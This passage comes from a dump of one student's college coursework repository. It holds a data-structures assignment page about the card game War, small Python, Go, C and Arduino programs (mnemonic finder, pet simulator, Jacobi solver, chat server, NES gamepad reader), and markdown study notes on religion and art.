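<p>For example, building the dealer's shuffled pile might look like the sketch below (the names here are illustrative, and the final line depends on whether a stack or a queue is chosen for the dealing pile):</p>\r\n      <div class=\"indent\" style=\"margin-top:-10px\">\r\n        <pre>cardset = list(range(10)) * 5   <span class=\"comment\"># five 0-9 decks</span>\r\nrandom.shuffle(cardset)         <span class=\"comment\"># shuffle before the cards enter a pile</span>\r\n<span class=\"keyword\">for</span> card <span class=\"keyword\">in</span> cardset:\r\n    dealingPile.push(card)      <span class=\"comment\"># or .enqueue(card) for a queue</span></pre>\r\n      </div>\r\n      <br>\r\n      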
<h3>A11 Reflection: </h3>\r\n Please create a new reflection document entitled <em>yourusername</em>-A11.docx.\r\n This reflection document is intended to help you think about how to\r\n decide when a stack, queue or other data structure is best for a\r\n specific need in the program.This reflection is to be completed\r\n individually (or with your pair-partner), though consultations with TAs\r\n and classmates are encouraged as long as they are appropriately\r\n acknowledged.<br>\r\n <br>\r\n This assignment is intended for you to work with stack and queues in\r\n order to play the game of \"War\". Although there are several data\r\n structures that CAN be used to implement the game, there are certain\r\n ones that are the most appropriate.<br>\r\n <br>\r\n Please respond to each of the prompts below.<br>\r\n <br>\r\n <ol>\r\n <li>For each pile listed below, which data structure did you decided\r\n to use and what was the reason for the choice? Do not use the hints\r\n in the assignment webpage as an explanation, but instead focus on\r\n the operations that you needed and how the data structure supports\r\n them.<br>\r\n <ol type=\"a\">\r\n <li>dealing pile</li>\r\n <li>a player's playing pile</li>\r\n <li>a player's storage pile</li>\r\n <li>the opponent's playing pile</li>\r\n <li>the opponent's storage pile</li>\r\n <li>loot pile</li>\r\n </ol>\r\n </li>\r\n <li>Precisely describe what the data structure should be for the\r\n initial pile that needs to be shuffled, and why it may or may not be\r\n different from the data structure for the dealing pile.</li>\r\n <li> Most design choices have advantages as well as disadvantages.\r\n Describe the primary advantages of using a stack or a queue data\r\n structure, which is admittedly restricted in how you would use it,\r\n versus a Python list for the last three piles in the list above.</li>\r\n <li>Describe at least one disadvantage of using a stack or a queue\r\n data structure, versus a Python list for the last three piles in the\r\n list above.</li>\r\n <li>Imagine you are in a hackathon where you are restricted to using a\r\n single data structure for all of the piles and you have to choose\r\n between using all stacks and using all queue.&nbsp; Explain whether\r\n you would choose all stacks or all queues if you want to have the\r\n smallest impact on how the game functioned?&nbsp; Explain what\r\n changes and why you made the choice you did.&nbsp; </li>\r\n </ol>\r\n <h3><br>\r\n </h3>\r\n <h3>On A11: Documenting, saving, and submitting your files</h3>\r\n <br>\r\n <h4>To submit:</h4>\r\n <ol>\r\n <li> Create a folder called <i>yourusername-csc236A11</i> </li>\r\n <li> Copy your program files into it. (all classes in addition to the\r\n driver file)</li>\r\n <li> Copy your completed reflection document <em>yourusername</em>-A11.docx\r\n into this folder. </li>\r\n <li> Zip this directory and submit your zipfile, <i>yourusername-csc236A11.zip</i>,\r\n onto Moodle when you are done. </li>\r\n </ol>\r\n <!-- footer: do not remove the weird-looking div you see next. It is important to push the footer to the bottom of some browsers. 
-->\r\n <div id=\"footer\"> <br>\r\n <br>\r\n <hr>\r\n <p> Copyright © 2016 | Licensed under a Creative Commons\r\n Attribution-Share Alike 3.0 United States License |\r\n http://cs.berea.edu/CSC236/</p>\r\n </div>\r\n </div>\r\n </div>\r\n </body>\r\n</html>\r\n" }, { "alpha_fraction": 0.5355600118637085, "alphanum_fraction": 0.5402126908302307, "avg_line_length": 29.704082489013672, "blob_id": "aaee9401674ff643da817a3167c97c952fb6627a", "content_id": "2913cc983f560215ba8575351d478d55c44ab408", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6018, "license_type": "no_license", "max_line_length": 106, "num_lines": 196, "path": "/CSC 236 - Software Design/AnimalGuessingGame/working.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nCreated by: Jesson Soto Ventura\nFinds all the mnemonics formed by a set of numbers\nA14\n\"\"\"\nimport json\n\ndef recursivemnemonics(word):\n \"\"\"\n Returns the next iteration on a word provided.\n Pre:\n A string that will be incremented\n Post:\n An incremented string along with an indicator of whether the cycle has been complemeted or not\n \"\"\"\n\n # Check the length of the word.\n # A word of length 1 is our base\n if len(word) != 1:\n\n # Get strip the first letter off the word and call itself\n stripped_word = word[1:]\n stripped_letter = word[0]\n\n # Increment the stripped_word\n is_end_of_cycle, next_word= recursivemnemonics(stripped_word)\n\n # Decide what to return\n if is_end_of_cycle:\n # For end of cycles incremented the first letter as well\n # Then return\n is_end_of_cycle, next_letter = get_next_letter(stripped_letter)\n return (is_end_of_cycle, next_letter + next_word)\n else:\n # Return only the incremented with the same first letter\n word = stripped_letter + next_word\n return (is_end_of_cycle, word)\n else:\n return get_next_letter(word)\n\ndef listmnemonics( word):\n \"\"\" Creates a list of the mnemonics returned by recursivemnemonics\n pre: A valid word to start the cycle with.\n post: A list of all the mnemonics formed from that word\n \"\"\"\n\n sequences = list()\n\n # Get the next sequence after the given word.\n is_end_of_cycle, next_sequence = recursivemnemonics(word)\n\n # Store the the sequence that follows it.\n sequences.append(next_sequence)\n\n # Continue storing the next sequence until the basecase has reached the end of its cycle\n while not is_end_of_cycle:\n is_end_of_cycle, next_sequence = recursivemnemonics(next_sequence)\n sequences.append(next_sequence)\n return(sequences)\n\n\ndef get_next_letter(letter):\n \"\"\" Returns the next letter in the cycle\n Parameters:\n letter - The letter to be advanced\n Pre:\n A single letter\n Post:\n A tuple indicating if the cycle started over along with the\n next letter in the cycle\n \"\"\"\n\n cycle = {\"A\":(False, \"B\"),\n \"B\":(False, \"C\"),\n \"C\":(True, \"A\"),\n \"D\":(False, \"E\"),\n \"E\":(False, \"F\"),\n \"F\":(True, \"D\"),\n \"G\":(False, \"H\"),\n \"H\":(False, \"I\"),\n \"I\":(True, \"G\"),\n \"J\":(False, \"K\"),\n \"K\":(False, \"L\"),\n \"L\":(True, \"J\"),\n \"M\":(False, \"N\"),\n \"N\":(False, \"O\"),\n \"O\":(True, \"M\"),\n \"P\":(False, \"Q\"),\n \"Q\":(False, \"R\"),\n \"R\":(False, \"S\"),\n \"S\":(True, \"P\"),\n \"T\":(False, \"U\"),\n \"U\":(False, \"V\"),\n \"V\":(True, \"T\"),\n \"W\":(False, \"X\"),\n \"X\":(False, \"Y\"),\n \"Y\":(False, \"Z\"),\n \"Z\":(True, \"W\"),\n }\n return cycle[letter]\n\ndef convert_number(number):\n \"\"\" 
Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n word = str()\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for digit in number:\n if digit in convert:\n word += convert[digit]\n else:\n return \"Invalid Sequence\"\n\n # Return the mnemonic\n return word\n\n\ndef main ():\n \"\"\" Displays all the mnemonics that can formed from a given number\n Pre:\n None\n Post:\n All the mnemonics that can be formed\n \"\"\"\n # Convert the number given by the user to a valid strong.\n number = raw_input(\"Enter a number: \")\n word = convert_number(number)\n\n # For a invalid sequence print invalid.\n if word != \"Invalid Sequence\":\n sequences = listmnemonics(word)\n sequences = get_valid_words(sequences)\n print(str(sequences))\n else:\n print (\"Invalid Number\")\n\ndef get_valid_words(all_words):\n word_file = open(\"valid_words.txt\", \"rw\")\n seek_positions = open(\"seek_positions.json\", \"rw\")\n valid_words = list()\n\n # Create a json from the file.\n word_locations = json.load(seek_positions)\n current_letter = all_words[0]\n found_word = \"\"\n while len(all_words) > 0:\n test_word = all_words[0].lower()\n if test_word[0] != current_letter:\n current_letter = test_word[0]\n start_position = word_locations[current_letter]\n word_file.seek(start_position)\n else:\n if found_word > test_word:\n all_words.remove(all_words[0])\n elif test_word == found_word:\n valid_words.append(test_word)\n all_words.remove(all_words[0])\n elif found_word < test_word:\n found_word = word_file.readline().lower()[:-2]\n\n return valid_words\n\ndef get_letter_locations():\n word_locations = open(\"seek_positions.json\", \"w\")\n word_file = open(\"valid_words.txt\", \"rb\")\n locations = dict()\n current_letter = \"a\"\n counter = 0\n for line in word_file:\n\n if current_letter == line[0].lower():\n locations[current_letter] = counter\n current_letter = chr(ord(current_letter) + 1)\n\n counter += len(line)\n\n for key in locations:\n word_file.seek(locations[key])\n line = word_file.readline()\n print(line,key)\n\n word_locations.write(json.dumps(locations, sort_keys=True, indent=4, separators = (',',': ')))\n\n\nmain()\n" }, { "alpha_fraction": 0.7046138644218445, "alphanum_fraction": 0.7046138644218445, "avg_line_length": 57.617645263671875, "blob_id": "8e461b9c4460f03e924788105b72573909170c0b", "content_id": "2f7c01a1bf851c19511e54b96d9943ce198174ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1994, "license_type": "no_license", "max_line_length": 135, "num_lines": 34, "path": "/GSTR 310 - Religion and Christianity/Quest For The Living God/Chapter 4.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Wreched Poverty\n * Poverty is the result of political, economic, and cultural institations working together to dehumize people\n * The Poor:\n * Faces of young children with physical and metal deficiencies\n * Children in cities, often sexually exploited\n * young people not being given opporunity to build future\n * indigenous people\n * pesentes deprived of land\n * old people no longer able to work\n\n# Intuition of God's Presence and Action\n * The poor believe in 
God's will and that poverty is allowed\n * This is the result of Christ being in a similar situation to us.\n * This results in the belief that waiting out pain leads to heaven\n * God is thus an integral part of the impoverished\n * Unity amongst the poor causes them to arise with the idea of God's preferential option for the poor\n * He prefers the poor not because of sin, but because he wants all to flourish and as such must help them more\n # The Hebrew Bible\n * Depicts God on the poor's side, not the pharaoh's, a shift from typical views\n * Argues that God loves the poor because he wants to watch the world thrive\n * The Bible never shows God as angry; he is always merciful for longer\n # New Testament\n * Women also seek God as a source of comfort\n * Again Jesus comes up to show that the poor who suffer will rejoice upon death\n # God as an idol\n * Maintaining relations with God entails giving up false idols:\n    * These include money, sex, drugs ... \n * Through saying that they give up false idols, the poor see themselves as being saved by God\n * God loves all, and his preferential love is only done in an effort to even out the abuse of some, although his love is universal\n\nQuestions:\n    What does it mean to be a wealthy Christian?\n    How does this view impact mega-churches or celebrity pastors?\n    Is the idea that God favors the poor a ploy by the wealthy to control the poor?\n\n" }, { "alpha_fraction": 0.584482729434967, "alphanum_fraction": 0.584482729434967, "avg_line_length": 24.217391967773438, "blob_id": "3a8be72bd0ae7a6858afc8305ef654f2583aa754", "content_id": "9e724c8d5f80dcf03d32147176e661b1384ddfa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 94, "num_lines": 23, "path": "/CSC 236 - Software Design/PetSimulator/main.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from simulator import Simulator\n\ndef main():\n    \"\"\"\n    Starts the simulator and reports out what the owner did on that day\n    \"\"\"\n    print(\"Welcome to a pet simulator. 
It will simulate a person taking care of thier pets.\")\n years = None\n try:\n years = raw_input(\"How many years should the simulator run: \")\n years = int(years)\n except:\n print(\"Invalid input.\")\n \n if type(years) is int:\n sim = Simulator()\n sim.start_simulation(years)\n else:\n print(\"Invalid input.\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.522002637386322, "alphanum_fraction": 0.5378128886222839, "avg_line_length": 27.10370445251465, "blob_id": "e45559c69b2250c544990c5937eaad1616151068", "content_id": "ca82e8d5aee006f77e33e5985940a990c74929de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3795, "license_type": "no_license", "max_line_length": 91, "num_lines": 135, "path": "/CSC 486 - Parallel and Distributed Systems/jacobi_sotoventuraj.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\"\nJesson Soto\njacobi\n\n\"\"\"\n\ndef empty_matrix(source, headers):\n empty = list()\n empty.append(source[0])\n rows = headers[0] - 1\n columns = headers[0] - 1\n for y in range(1, rows):\n temp_row = list()\n temp_row.append(source[y][0])\n for x in range(1, columns):\n temp_row.append(None)\n temp_row.append(source[y][-1])\n empty.append(temp_row)\n empty.append(source[-1])\n return empty\n\n\ndef jacobi (source, headers):\n \"\"\" Takes the values from the source and produces a new\n list of vaules that have had the jacobi algorithmn preformed\n on them.\n\n Args:\n source - The source list (2D), with only the data points.\n headers - A tuple of the x and y values\n\n Returns:\n A list containing the new values, the values are a mix of strings and ints.\n \"\"\"\n\n # Find the bounds\n max_rows = headers[0] - 1\n max_columns = headers[1] - 1\n\n # Create the first row.\n result = empty_matrix(source, headers)\n\n swap = True\n for i in range(100):\n # For every row preform jacobi\n for y in range(1, max_rows):\n # Store the current jacobi values in a temp row\n for x in range(1, max_columns):\n if(swap):\n result[x][y] = 0.25 * (float(source[x-1][y]) + float(source[x+1][y]) +\n float(source[x][y-1]) + float(source[x][y+1]))\n else:\n source[x][y] = 0.25 * (float(result[x-1][y]) + float(result[x+1][y]) +\n float(result[x][y-1]) + float(result[x][y+1]))\n swap = not(swap)\n\n return result\n\n\ndef main():\n # Used to house the 1D variant of the array\n jacobi_data_flat = list()\n # Used to house x and y\n headers = None\n\n # Open the file\n with open(\"test.in\", \"r\") as file:\n # Clean the data for later processing\n raw_data = file.read()\n raw_data = raw_data.replace(\"\\n\", \" \")\n raw_data = raw_data.replace(\"\\r\", \" \")\n raw_data = raw_data.replace(\" \", \" \")\n jacobi_data_flat = raw_data.split(\" \")\n\n # Strip out the headers\n headers = (int(jacobi_data_flat[0]), int(jacobi_data_flat[1]))\n jacobi_data_flat = jacobi_data_flat[2:-1]\n # Conver the 1D list to a 2D list\n jacobi_data = roll_matrix(jacobi_data_flat, headers)\n\n # Preform jacobi on the lsit\n jacobi_result = jacobi(jacobi_data, headers)\n\n # Save the results\n write_data(jacobi_result, headers)\n\ndef write_data(data, headers):\n \"\"\" Writes out the Jacobi data\"\n\n Args:\n data - A 2D list containing the data\n headers - The size of the list\n\n Returns:\n Creates a file named jacboi.out\n \"\"\"\n\n # Open a file\n with open(\"1024x1024.jacobi.out\", \"w\") as file:\n # Write out the headers\n file.write(str(headers[0]) + \" \")\n file.write(str(headers[1]) + 
\"\\n\")\n\n # Write out each row\n for row in data:\n for entry in row:\n file.write(str(entry) + \" \")\n else:\n file.write(\"\\n\")\n\ndef roll_matrix(flat, headers):\n \"\"\" Takes a 1D list and makes it 2D\n\n Args:\n flat - The 1D list\n headers - Tuple of x and y\n\n Returns:\n list of 2D source values\n \"\"\"\n\n # Empty list\n jacobi_data = list()\n\n # Strip out a rows worth of data and add it to the list\n for index in range(headers[1]):\n start = index * headers[1]\n end = ((index + 1) * headers[1])\n row_data = flat[start:end]\n for i in range(len(row_data)):\n row_data[i] = int(row_data[i])\n jacobi_data.append(row_data)\n return jacobi_data\n\nmain()\n\n" }, { "alpha_fraction": 0.5605006814002991, "alphanum_fraction": 0.563282310962677, "avg_line_length": 26.11320686340332, "blob_id": "f1cfe05fee89f5a2ebeeafa90508918d4a3db8fc", "content_id": "e3e79c86eef5ff2db7c9be058eec1529e49a6420", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 62, "num_lines": 53, "path": "/CSC 236 - Software Design/PetSimulator/owner.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from food import Food\nfrom pet import Pet\nimport random\n\nclass Owner():\n\n def __init__(self, name):\n \"\"\" Creates an owner for the pets \"\"\"\n self.name = name\n\n # Each owner may have muliple pets\n self.pets = list()\n\n def set_name(self, name):\n \"\"\" Set the name of the owner \"\"\"\n self.name = name\n\n def get_name(self):\n \"\"\" Gets the name of the owner \"\"\"\n return self.name\n\n def add_pet(self, pet):\n \"\"\" Adds a pet to the owner's list \"\"\"\n self.pets.append(pet)\n\n def remove_pet(self, pet):\n \"\"\" Removes a pet from the owner's list \"\"\"\n self.pets.remove(pet)\n\n def get_pets(self):\n \"\"\" Returns all the user's pets \"\"\"\n return self.pets\n\n def get_pet_count(self):\n \"\"\" Returns the amount of pets that thee user has \"\"\"\n return len(self.pets)\n\n def get_random_pet(self):\n \"\"\" Returns a random pet \"\"\"\n return random.choice(self.pets)\n\n def play(self, pet):\n \"\"\" Let's the owner play with one of thier pets \"\"\"\n happiness = pet.get_happiness()\n adjustment = pet.adjust_happines(random.randint(1,20))\n def feed(self, pet, food):\n \"\"\" Let's the owner feed one of thier pets \"\"\"\n hunger = pet.get_hunger()\n name = pet.get_name()\n\n fillness = food.get_fillness()\n food_name = food.get_name()\n pet.adjust_hunger(-1 * fillness)\n\n" }, { "alpha_fraction": 0.6703671813011169, "alphanum_fraction": 0.6737830638885498, "avg_line_length": 25.0222225189209, "blob_id": "b10a277cfa9f87f4f0dd2bf20d555c32e71db786", "content_id": "04a31ea9b3c2859605654341e0b4c6642d0b5cd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/CSC 420 - Programming Languages/GO/TalkTalk/TalkTalk.go", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "/* tick-tock.go */\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n)\n\nvar chat = make(map[string]string)\n\nfunc post_message(writer http.ResponseWriter, request *http.Request) {\n\trequest.ParseForm()\n\tvar message string = request.Form.Get(\"Message\")\n\tvar username string = request.Form.Get(\"Username\")\n\tvar channel string = request.Form.Get(\"Channel\")\n\tif message != \"\" {\n\t\tif _, 
exists := chat[channel]; exists {\n\n\t\t\tchat[channel] += username + \" ~> \" + message + \"\\n\"\n\t\t} else {\n\t\t\tchat[channel] = username + \" ~> \" + message + \"\\n\"\n\t\t}\n\t\tfmt.Println(channel)\n\t}\n\tfmt.Fprintf(writer, chat[channel])\n}\n\nfunc checkMessage(writer http.ResponseWriter, request *http.Request) {\n\trequest.ParseForm()\n\tvar channel string = request.Form.Get(\"Channel\")\n\tvar username string = request.Form.Get(\"Username\")\n\tif _, exists := chat[channel]; !exists {\n\t\tchat[channel] = username + \" Created \" + channel + \"\\n\"\n\t}\n\tfmt.Fprintf(writer, chat[channel])\n\tfmt.Println(channel)\n}\n\nfunc main() {\n\thttp.Handle(\"/\", http.FileServer(http.Dir(\".static\")))\n\thttp.HandleFunc(\"/post_message\", post_message)\n\thttp.HandleFunc(\"/messages\", checkMessage)\n\tlog.Fatal(http.ListenAndServe(\":9999\", nil))\n}\n" }, { "alpha_fraction": 0.5074074268341064, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 21.5, "blob_id": "c7be27db0fdbe503be2d6f91167604ceefc3982d", "content_id": "d2ac04d37773c4e2384a80bc2fbf808dd4f9eaeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 270, "license_type": "no_license", "max_line_length": 67, "num_lines": 12, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ext6.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int limit = 20;\n for(int i = 0; limit > i; i++){\n int summation = 0;\n for(int count = 0; i > count; count++){\n summation += count;\n }\n printf(\"The sum of the numbers 0 to %d is %d\\n\", i, summation);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5631529092788696, "alphanum_fraction": 0.5707502365112305, "avg_line_length": 24.071428298950195, "blob_id": "01c569ecb5f5178cbef6062ee471f45712c3accf", "content_id": "63f15f445f8abfad1615abd5189c5346258b9a0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 84, "num_lines": 42, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/vowel_count.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n#include <ctype.h>\n\n#define READING 0\n#define COUNT 1\n\nint main(int argc, char* argv[]){\n /* Any text is allowed but only vowels are counted\n * Takes a file in as input\n */\n if (argc < 2){\n printf(\"Please use with a file: ./a.out filepath example ./a.out text.txt\\n\");\n return -1;\n }\n\n char* filepath = argv[1];\n FILE* text = fopen(filepath, \"r\");\n int vowel_count = 0;\n int state = READING;\n char character = '\\0';\n do{\n switch(state){\n /* Starts by reading then goes to count stage when a vowel is fond and back */\n case READING:\n character = fgetc(text);\n character = tolower(character);\n if (character == 'a' || character == 'e' || character == 'i'||\n character == 'o' || character == 'u'){\n state = COUNT;\n }\n break;\n case COUNT:\n vowel_count += 1;\n state = READING;\n break;\n }\n }while(character != EOF);\n printf(\"%d vowels found\\n\", vowel_count);\n}\n" }, { "alpha_fraction": 0.52491694688797, "alphanum_fraction": 0.5259135961532593, "avg_line_length": 27.93269157409668, "blob_id": "73c82135f7e503015988b1ba91813cf4644d5646", "content_id": "f25334f38c8a1bd9bba6388cb8a41fcc9e2ce7da", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 3010, "license_type": "no_license", "max_line_length": 77, "num_lines": 104, "path": "/CSC 236 - Software Design/War/deck.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n CSC 236 -\n Creates a Card Class, which will allow operator overriding.\n Creates a StackedDeck and QueuedDeck, which inheriets the Stack and Queue\n class to simplify the use.\n\"\"\"\n\nfrom queue import Queue\nfrom stack import Stack\n\nclass Card(object):\n def __init__(self, number):\n \"\"\" Enables the use of a card type\"\"\"\n self.number = number\n\n def get_number(self):\n \"\"\" Returns the number of the card\"\"\"\n return self.number\n\n def __gt__(self, other):\n \"\"\" Allows greater than comparisons on cards\n pre: Two Cards\n post: A boolean indicating greatness \n \"\"\"\n if isinstance(other, Card):\n if self.get_number() > other.get_number():\n return True\n else:\n return False\n def __lt__(self, other):\n \"\"\" Allows less than comparisons on cards\n pre: Two Cards\n post: A boolean indicating lessness \n \"\"\"\n if isinstance(other, Card):\n if self.get_number() < other.get_number():\n return True\n else:\n return False\n\n def __eq__(self, other):\n \"\"\" Allows equals comparisons on cards\n pre: Two Cards\n post: A boolean indicating equalness\n \"\"\"\n if isinstance(other, Card):\n if self.get_number() == other.get_number():\n return True\n else:\n return False\n \n def __ne__(self, other):\n \"\"\" Allows less than comparisons on cards \n pre: Two Cards\n post: A boolean indicating not-equalness\n \"\"\"\n if isinstance(other, Card):\n if self.get_number() != other.get_number():\n return True\n else:\n return False\n\n def __str__(self):\n return str(self.get_number())\n\nclass QueuedDeck(Queue):\n \n def __init__(self):\n \"\"\" Creates a queued Deck\"\"\"\n super(QueuedDeck, self).__init__()\n\n def __add__(self,other):\n \"\"\" Allows cards to be added to the queue \n pre: A deck, and a Card\n post: A deck with the card added to the top\n \"\"\"\n if isinstance(other, Card):\n self.enqueue(other)\n else:\n raise NotImplemented\n\nclass StackedDeck(Stack):\n def __init__(self):\n \"\"\" Creates a Stacked Deck\"\"\"\n super(StackedDeck, self).__init__()\n \n def add(self, card):\n \"\"\" Adds card to the top of a stack.\n pre: a card\n post: places x on top of stack\n note: added to keep the sytax consistant with queued\n \"\"\"\n self.push(card)\n\n def __add__(self,other):\n \"\"\" Allows cards to be added to the queue \n pre: A deck, and a Card\n post: A deck with the card added to the top\n \"\"\"\n\n if isinstance(other, Card):\n self.push(other)\n else:\n raise NotImplemented\n\n" }, { "alpha_fraction": 0.48622366786003113, "alphanum_fraction": 0.5032414793968201, "avg_line_length": 19.915254592895508, "blob_id": "05c78bd13bd9c50763a4198465f3a71e7f5b483e", "content_id": "d689c754e39529c26c4f66efacca8a6c7481d342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 66, "num_lines": 59, "path": "/CSC 386 - Embedded Systems/RC-Nespi/nes.ino", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Code from https://eskerda.com/arduino-nes-gamepad/ \"\"\"\nint CLK = 2;\nint LATCH = 3;\nint DATA = 4;\n\nbyte last_read = 0xFF;\n\nvoid setup();\nvoid loop();\n\nvoid setup()\n{\n Serial.begin(115200);\n pinMode(CLK, OUTPUT);\n pinMode(LATCH, 
OUTPUT);\n pinMode(DATA, INPUT);\n}\n\nvoid loop()\n{\n byte reading = read_NESpad();\n if (reading != last_read){\n Serial.println(reading, BIN);\n }\n last_read = reading;\n}\n\nbyte read_NESpad() {\n /*\n NES Word Mapping\n x x x x x x x x\n | | | | | | | |_ A\n | | | | | | |___ B\n | | | | | |_____ SELECT\n | | | | |_______ START\n | | | |_________ UP\n | | |___________ DOWN\n | |_____________ LEFT\n |_______________ RIGHT\n */\n\n // Send a HIGH pulse to latch. Make 8 shift register store state\n // of all buttons\n digitalWrite(LATCH, HIGH);\n delayMicroseconds(12);\n digitalWrite(LATCH, LOW);\n\n // Clock the 8 shift register to get the\n // state of the buttons\n byte output = 0x00;\n for (int i = 0; i < 8; i++){\n output |= digitalRead(DATA) << i;\n digitalWrite(CLK, HIGH);\n delayMicroseconds(6);\n digitalWrite(CLK, LOW);\n delayMicroseconds(6);\n }\n return output;\n}\n" }, { "alpha_fraction": 0.5729166865348816, "alphanum_fraction": 0.5798611044883728, "avg_line_length": 27.024391174316406, "blob_id": "b2c0fec4dbf98c7e76caae361bb41d69e2496969", "content_id": "04f7f146820cc4a7aaf1cf04b7fddd4f2b295436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 54, "num_lines": 41, "path": "/CSC 236 - Software Design/PetSimulator/pet.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import random\nclass Pet:\n \"\"\" A class for all pet related attributes \"\"\"\n def __init__(self, name):\n \"\"\" Creates the pet\"\"\"\n\n self.name = name\n self.happiness = random.randint(20,50)\n self.hunger = random.randint(20, 50)\n\n def set_name(self, name):\n \"\"\" Sets the pet's name \"\"\"\n self.name = name\n\n def get_name(self):\n \"\"\" Gets the pet's name \"\"\"\n return self.name\n\n def get_hunger(self):\n \"\"\" Returns the hunger level of the pet \"\"\"\n return self.hunger\n\n def set_hunger(self, hunger):\n \"\"\" Sets the hunger level of the pet \"\"\"\n self.hunger = hunger\n\n def set_happiness(self, happiness):\n \"\"\" Sets the happiness level of the pet \"\"\"\n self.happiness = happiness\n\n def get_happiness(self):\n \"\"\" Sets the happiness level of pet\"\"\"\n return self.happiness\n\n def adjust_hunger(self, adjustment):\n \"\"\" Adjusts the hunger by a delta amount \"\"\"\n self.hunger += adjustment\n\n def adjust_happines(self, adjustment):\n \"\"\" Adjusts the happiness by a delta amount\"\"\"\n self.hunger += adjustment\n\n\n\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 67, "blob_id": "1d4db2ad3224093cf411ffeebbac37a39fe39f3c", "content_id": "6ec9befeca3e980830de733951dd7be8ad05f998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 68, "license_type": "no_license", "max_line_length": 67, "num_lines": 1, "path": "/AST 260 - Buddhism/Ascetic.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Would being alone not be an extreme and thus not the middle road?\n" }, { "alpha_fraction": 0.74622642993927, "alphanum_fraction": 0.74622642993927, "avg_line_length": 52, "blob_id": "19e823593304da445079eabe6b7f857e74ffa5c4", "content_id": "e13c7e2430e1539a2af0a2dd37b51678dafae6c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 169, "num_lines": 20, "path": "/GSTR 
310 - Religion and Christianity/Quest For The Living God/Chapter 8.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Generous God Of The Religions\n\n# National Pluralism\n * This is the idea that there is a dispersal of religion through nations; religion has not simply spread from a single place.\n * Diffusion of religion into the culture of a nation\n\n# Catholic Questions:\n * Can non-baptised people be saved, and the implications of that choice\n * Mercy reaches beyond the Christian word and sacrament\n * People are saved because of their religion\n\n# Dialogs\n * Life - the religion of others is as true to them as it is to oneself; this can cause doubt amongst some or it can cause renewed faith\n * Theology - What does it mean to interact with a scholar of another religion, and how does this shape the view of one religion over another\n *\n \n# Questions\n * Is the idea that the church would allow other religions to be saved a result of pluralism or the spread of relativism \n * Has the spread of pluralism possibly been the reason for the decline in religion amongst younger generations; could it also be the cause for a rise in agnostic views\n *\n" }, { "alpha_fraction": 0.7985028028488159, "alphanum_fraction": 0.7985028028488159, "avg_line_length": 176.88888549804688, "blob_id": "42c0043515733cc0980e6ebfbbd7cfcd1a591a81", "content_id": "1d4b65bebaf552cb4a6f4be63bea6e6caec4dce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1603, "license_type": "no_license", "max_line_length": 1528, "num_lines": 9, "path": "/ARH 243 - Women In Art/Simons-dump.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#Quick dump\n\nThe portrayal of women in portraits presents an interesting topic, in part due to how it reflects the ideals of the time. The assumption that the art presents not an idealized but a realistic view of the person is incorrect. The images act as a form of symbolism reflecting the masculine ownership views that were present at the time. These symbolic ideas of ownership are reflected in the manner in which women are painted as portraits. This artistic design presents women as flat objects that are to be gazed upon. The presentation of a portrait reflects that of a woman in a window, being caught. Furthermore, the inclusion of masculine 